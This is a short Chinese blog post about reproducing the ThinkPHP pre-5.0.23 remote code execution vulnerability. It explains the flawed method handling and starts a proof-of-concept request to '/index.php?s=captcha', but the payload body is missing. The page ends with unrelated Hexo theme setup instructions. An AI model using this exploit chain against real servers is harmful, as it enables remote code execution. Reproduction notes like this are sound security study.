背景
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
复现过程
发送如下POC
1 | POST /index.php?s=captcha HTTP/1.1 |

参考链接
http://github.com/vulhub/vulhub/blob/master/thinkphp/5.0.23-rce/README.zh-cn.md/
走,一个人走,坚定的脚步,踏实的泥土
缺失模块。
1、请确保node版本大于6.2
2、在博客根目录(注意不是yilia根目录)执行以下命令:
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置:
jsonContent:
meta: false
pages: false
posts:
title: true
date: true
path: true
text: false
raw: false
content: false
slug: false
updated: false
comments: false
link: false
permalink: false
excerpt: false
categories: false
tags: true